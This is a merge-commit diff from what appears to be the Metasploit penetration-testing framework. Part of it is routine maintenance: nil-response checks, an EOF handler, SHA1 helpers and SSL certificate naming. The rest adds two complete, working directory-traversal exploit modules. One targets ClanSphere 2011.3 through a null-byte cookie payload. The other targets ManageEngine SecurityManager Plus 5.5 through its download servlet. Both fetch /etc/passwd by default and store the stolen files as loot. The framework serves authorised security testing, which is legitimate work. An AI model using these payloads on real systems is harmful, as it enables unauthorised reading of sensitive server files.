Merge branch 'master' into bug/handle-100-continue

Author: jvazquez-r7

lib/msf/core/handler/bind_tcp.rb

@@ -127,7 +127,7 @@ def start_handler
 				rescue Rex::ConnectionRefused
 					# Connection refused is a-okay
 				rescue ::Exception
-					wlog("Exception caught in bind handler: #{$!}")
+					wlog("Exception caught in bind handler: #{$!.class} #{$!}")
 				end
 
 				break if client
@@ -138,7 +138,6 @@ def start_handler
 
 			# Valid client connection?
 			if (client)
-
 				# Increment the has connection counter
 				self.pending_connections += 1
 

lib/rex/io/stream_abstraction.rb

@@ -149,6 +149,9 @@ def monitor_rsock
 							closed = true
 							wlog("monitor_rsock: closed remote socket due to nil read")
 						end
+					rescue EOFError => e
+						closed = true
+						dlog("monitor_rsock: EOF in rsock")
 					rescue ::Exception => e
 						closed = true
 						wlog("monitor_rsock: exception during read: #{e.class} #{e}")

lib/rex/post/meterpreter/client.rb

@@ -154,7 +154,7 @@ def swap_sock_plain_to_ssl
 		ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
 
 		# Use non-blocking OpenSSL operations on Windows
-		if not ( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
+		if !( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
 			ssl.accept
 		else
 			begin
@@ -211,12 +211,19 @@ def generate_ssl_context
 		cert.version = 2
 		cert.serial  = rand(0xFFFFFFFF)
 
+		# Depending on how the socket was created, getsockname will
+		# return either a struct sockaddr as a String (the default ruby
+		# Socket behavior) or an Array (the extend'd Rex::Socket::Tcp
+		# behavior). Avoid the ambiguity by always picking a random
+		# hostname. See #7350.
+		subject_cn = Rex::Text.rand_hostname
+
 		subject = OpenSSL::X509::Name.new([
 				["C","US"],
 				['ST', Rex::Text.rand_state()],
 				["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
 				["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
-				["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
+				["CN", subject_cn],
 			])
 		issuer = OpenSSL::X509::Name.new([
 				["C","US"],

lib/rex/text.rb

@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'digest/md5'
+require 'digest/sha1'
 require 'stringio'
 
 begin
@@ -812,6 +813,20 @@ def self.md5(str)
 		Digest::MD5.hexdigest(str)
 	end
 
+	#
+	# Raw SHA1 digest of the supplied string
+	#
+	def self.sha1_raw(str)
+		Digest::SHA1.digest(str)
+	end
+
+	#
+	# Hexidecimal SHA1 digest of the supplied string
+	#
+	def self.sha1(str)
+		Digest::SHA1.hexdigest(str)
+	end
+
 	#
 	# Convert hex-encoded characters to literals.
 	# Example: "AA\\x42CC" becomes "AABCC"

modules/auxiliary/admin/officescan/tmlisten_traversal.rb

@@ -51,6 +51,11 @@ def run_host(target_host)
 				'method'  => 'GET',
 			}, 20)
 
+		if not res
+			print_error("No response from server")
+			return
+		end
+
 		http_fingerprint({ :response => res })
 
 		if (res.code >= 200)

modules/auxiliary/dos/http/sonicwall_ssl_format.rb

@@ -58,7 +58,7 @@ def run
 				'uri' => datastore['URI'] + fmt,
 			})
 
-			if res.code == 200
+			if res and res.code == 200
 				res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
 				print_status("Information leaked: #{$1}")
 			end

modules/auxiliary/scanner/http/clansphere_traversal.rb

@@ -0,0 +1,91 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'ClanSphere 2011.3 Local File Inclusion Vulnerability',
+			'Description'    => %q{
+				This module exploits a directory traversal flaw found in Clansphere 2011.3.
+				The application fails to handle the cs_lang parameter properly, which can be
+				used to read any file outside the virtual directory.
+			},
+			'References'     =>
+				[
+					['OSVDB', '86720'],
+					['EDB', '22181']
+				],
+			'Author'         =>
+				[
+					'blkhtc0rp',  #Original
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'DisclosureDate' => "Oct 23 2012"
+		))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']),
+				OptString.new('FILE',      [true, 'The file to obtain', '/etc/passwd']),
+				OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+			], self.class)
+	end
+
+
+	def run_host(ip)
+		base = target_uri.path
+		base << '/' if base[-1,1] != '/'
+
+		peer = "#{ip}:#{rport}"
+
+		print_status("#{peer} - Reading '#{datastore['FILE']}'")
+
+		traverse = "../" * datastore['DEPTH']
+		f = datastore['FILE']
+		f = f[1, f.length] if f =~ /^\//
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{base}index.php",
+			'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
+		})
+
+		if res and res.body =~ /^Fatal error\:/
+			print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:")
+			print_error("\t1. File does not exist.")
+			print_error("\t2. No permission.")
+			print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
+
+		elsif res and res.code == 200
+			pattern_end = "     UTC +1 - Load:"
+			data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip
+			fname = datastore['FILE']
+			p = store_loot(
+				'clansphere.cms',
+				'application/octet-stream',
+				ip,
+				data,
+				fname
+			)
+
+			vprint_line(data)
+			print_good("#{peer} - #{fname} stored as '#{p}'")
+
+		else
+			print_error("#{peer} - Fail to obtain file for some unknown reason")
+		end
+	end
+
+end

modules/auxiliary/scanner/http/ektron_cms400net.rb

@@ -67,7 +67,7 @@ def run_host(ip)
 
 			#Check for HTTP 200 response.
 			#Numerous versions and configs make if difficult to further fingerprint.
-			if (res.code == 200)
+			if (res and res.code == 200)
 				print_status("Ektron CMS400.NET install found at #{target_url}  [HTTP 200]")
 
 				#Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.

modules/auxiliary/scanner/http/manageengine_traversal.rb renamed to modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb

@@ -0,0 +1,92 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal',
+			'Description'    => %q{
+					This module exploits a directory traversal flaw found in ManageEngine
+				SecurityManager Plus 5.5 or less.  When handling a file download request,
+				the DownloadServlet class fails to properly check the 'f' parameter, which
+				can be abused to read any file outside the virtual directory.
+			},
+			'References'     =>
+				[
+					['OSVDB', '86563'],
+					['EDB', '22092']
+				],
+			'Author'         =>
+				[
+					'blkhtc0rp',  #Original
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'DisclosureDate' => "Oct 19 2012"
+		))
+
+		register_options(
+			[
+				OptPort.new('RPORT',       [true, 'The target port', 6262]),
+				OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+				OptString.new('FILE',      [true, 'The file to obtain', '/etc/passwd']),
+				OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+			], self.class)
+	end
+
+
+	def run_host(ip)
+		base = target_uri.path
+		base << '/' if base[-1,1] != '/'
+
+		peer = "#{ip}:#{rport}"
+		fname = datastore['FILE']
+
+		print_status("#{peer} - Reading '#{datastore['FILE']}'")
+		traverse = "../" * datastore['DEPTH']
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri'      => "#{base}store",
+			'vars_get' => {
+				'f' => "#{traverse}#{datastore['FILE']}"
+			}
+		})
+
+
+		if res and res.code == 500 and res.body =~ /Error report/
+			print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:")
+			print_error("\t1. File does not exist.")
+			print_error("\t2. The server does not have any patches deployed.")
+			print_error("\t3. Your 'DEPTH' option isn't deep enough.")
+			print_error("\t4. Some kind of permission issues.")
+
+		elsif res and res.code == 200
+			data = res.body
+			p = store_loot(
+				'manageengine.securitymanager',
+				'application/octet-stream',
+				ip,
+				data,
+				fname
+			)
+
+			vprint_line(data)
+			print_good("#{peer} - #{fname} stored as '#{p}'")
+
+		else
+			print_error("#{peer} - Fail to obtain file for some unknown reason")
+		end
+	end
+
+end